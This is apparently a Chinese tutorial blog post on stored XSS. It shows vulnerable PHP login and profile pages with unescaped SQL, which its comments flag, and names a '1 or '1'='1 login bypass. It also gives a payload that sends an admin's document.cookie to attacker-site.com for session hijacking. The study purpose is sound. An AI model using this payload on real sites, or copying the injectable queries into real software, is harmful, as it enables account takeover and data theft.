这里是常见的login.php的代码,大致说下执行流程, 根据user_name查找相应的pass_word,然后将用户提供的password与在数据库里的pass_word进行比较,如果验证通过就建立一个user_name的session:
<?php
$Host= ‘www.baidu.com‘;
$Dbname= ‘app_db‘;
$User= ‘you_knows‘;
$Password= ‘you_dontknows‘;
$Schema = ‘test‘;
$Conection_string="host=$Host dbname=$Dbname user=$User password=$Password";
/* Connect with database asking for a new connection*/
$Connect=pg_connect($Conection_string,$PGSQL_CONNECT_FORCE_NEW);
/* Error checking the connection string */
if (!$Connect) {
echo "Database Connection Failure";
exit;
}
/* 这里就是查询数据的过程,不要学这个,直接就是SQL Injection 的漏洞 ,user_name 都没有 string转义, 直接‘1 or ‘1‘=‘1 就登录了, */
$query="SELECT user_name,password from $Schema.members where user_name=‘".$_POST[‘user_name‘]."‘;";
$result=pg_query($Connect,$query);
$row=pg_fetch_array($result,NULL,PGSQL_ASSOC);
$user_pass = md5($_POST[‘pass_word‘]);
$user_name = $row[‘user_name‘];
if(strcmp($user_pass,$row[‘password‘])!=0) {
echo "Login failed";
}
else {
# Start the session
session_start();
$_SESSION[‘USER_NAME‘] = $user_name; /* 建立session 字典对象, 同时在客户端会存有cookie */
echo "<head> <meta http-equiv=\"Refresh\" content=\"0;url=home.php\" > </head>";
}
?>这里还有一个home.php的代码,可以根据登录用户是admin 或者是不同的用户,做一个分权的处理,对admin列出功能菜单,对于其他用户,提供包含输入的框的form,可以在数据库插入新的数据:
<?php
session_start();
if(!$_SESSION[‘USER_NAME‘]) {
echo "Need to login";
}
else {
/* 其实好的PHP代码的数据库链接类都是应该放在单独的程序里的,不会这么冗余的丢在这 */
$Host= ‘www.baidu.com‘;
$Dbname= ‘app_db‘;
$User= ‘you_knows‘;
$Password= ‘you_dontknows‘;
$Schema = ‘test‘;
$Conection_string="host=$Host dbname=$Dbname user=$User password=$Password";
$Connect=pg_connect($Conection_string,$PGSQL_CONNECT_FORCE_NEW);
if($_SERVER[‘REQUEST_METHOD‘] == "POST") {
/* 在网上找的这段话代码太坑了,这里又是罪恶的不转义拼接,这个在任何时候都是不可取的,不要信任用户的任意输入 */
$query="update $Schema.members set display_name=‘".$_POST[‘disp_name‘]."‘ where user_name=‘".$_SESSION[‘USER_NAME‘]."‘;";
pg_query($Connect,$query);
echo "Update Success";
}
else {
if(strcmp($_SESSION[‘USER_NAME‘],‘admin‘)==0) {
echo "Welcome admin<br><hr>";
echo "List of user‘s are<br>";
$query = "select display_name from $Schema.members where user_name!=‘admin‘";
$res = pg_query($Connect,$query);
while($row=pg_fetch_array($res,NULL,PGSQL_ASSOC)) {
echo "$row[display_name]<br>";
}
}
else {
/* 在PHP中的语法都是双引号和单引号还有关键括号都需要"\"转义 */
echo "<form name=\"tgs\" id=\"tgs\" method=\"post\" action=\"home.php\">";
echo "Update display name:<input type=\"text\" id=\"disp_name\" name=\"disp_name\" value=\"\">";
echo "<input type=\"submit\" value=\"Update\">";
}
}
}
?>攻击者可以通过一个普通用户登录进来,然后在输入框中提交以下数据(在没被过滤的情况下):<a href=# onclick=\"document.location=\‘http://attacker-site.com/xss.php?c=\‘+escape\(document.cookie\)\;\">美女admin </a>这样根据home.php的过滤条件,如果是admin账户,就会显示含有"美女admin"的列表,然后如果是点击了"美女admin" 的链接,他cookie就可以被收集到我的服务器上(这里是被动式的触发的漏洞,具有一定的猥琐性),搭建的XSS平台一定也有挺多的简单方法,最简单的就是在Apache的access.log中查看,类似的日志是:
有了该攻击者的session-id, 攻击者在会话有效期内即可获得admin的用户权限,并且由于攻击数据已经在数据库,所以只要不删除数据库里的记录,还是会有可能受到攻击,是属于持久性的。其实这里的钓鱼邮件等都是利用这种简单的方法来实现的的,这里的猥琐方法有很多,这里就说这点吧。
XSS学习笔记(二)(存储型XSS,持久型攻击),布布扣,bubuko.com
原文:http://blog.csdn.net/l_f0rm4t3d/article/details/24182311